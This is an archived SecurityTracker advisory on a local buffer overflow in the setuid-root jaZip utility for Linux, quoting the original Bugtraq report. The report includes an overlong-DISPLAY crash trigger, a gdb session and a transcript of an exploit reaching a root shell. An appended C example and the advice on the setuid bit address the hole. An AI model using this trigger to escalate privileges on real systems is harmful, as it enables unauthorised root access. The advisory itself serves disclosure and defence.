SecurityTracker.com
Category:   Application (Generic)  >   JaZip
Vendors:   Smith, Jarrod
JaZip Linux Utility for Iomega Zip/Jaz Drives May Give Local Users Root Access
SecurityTracker Alert ID:  1000588
SecurityTracker URL:  http://securitytracker.com/id/1000588
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 15 2001
Impact:   Root access via local system, User access via local system
Exploit Included:  Yes  

Description:   JaZip, a Linux utility for managing an Iomega Zip or Jaz drive, reportedly contains a buffer overflow that can allow local users to gain JaZip privileges. Because the utility is often installed setuid root, root privileges may be obtained.

The author indicates that the tested rpm version was:

ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm

The author has created a Perl Exploit (see the original message).

Impact:   A local user could obtain the privileges of the JaZip program, which may be setuid, giving a local attacker root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  unknown
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  Vulnerability in jaZip.


Dear, Bugtraq.

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was known. Please note that I can not
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
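
Added example, not part of the original advisory or of jaZip: the gdb session above shows an over-long DISPLAY value overwriting the saved return address, so a setuid program should bound and validate that variable before using it. The function name copy_display and the 256-byte limit are assumptions made for illustration.

```c
/* Added example, hypothetical: jaZip's source is not shown on this page. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 256 /* assumed limit, not a jaZip constant */

/* The crash pattern is an unchecked copy with a caller-controlled length:
 *     char buf[DISPLAY_MAX]; strcpy(buf, getenv("DISPLAY"));
 * copy_display() accepts only a value that fits in out, uses host/display
 * characters and contains a ':'. Returns 0 on success, -1 on rejection. */
int copy_display(const char *value, char *out, size_t outlen)
{
    size_t n = 0, i;
    int has_colon = 0;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0'; /* never leave stale data behind on rejection */
    if (value == NULL)
        return -1;
    while (n < outlen && value[n] != '\0') /* never reads past outlen bytes */
        n++;
    if (n == 0 || n == outlen) /* n == outlen: no room for the terminator */
        return -1;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (c == ':')
            has_colon = 1;
        else if (!isalnum(c) && c != '.' && c != '-' && c != '_' && c != '/')
            return -1;
    }
    if (!has_colon)
        return -1;
    memcpy(out, value, n + 1); /* n + 1 <= outlen, terminator included */
    return 0;
}

int main(void)
{
    char display[DISPLAY_MAX];
    if (copy_display(getenv("DISPLAY"), display, sizeof display) != 0) {
        fprintf(stderr, "rejecting DISPLAY: missing, too long or malformed\n");
        return EXIT_FAILURE;
    }
    printf("DISPLAY accepted: %s\n", display);
    return EXIT_SUCCESS;
}
```

With no fix available at the time of the entry, the other control the advisory points to is the setuid bit itself: a copy of jazip that is not setuid root runs only with the caller's own privileges.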

Copyright 2021, SecurityGlobal.net LLC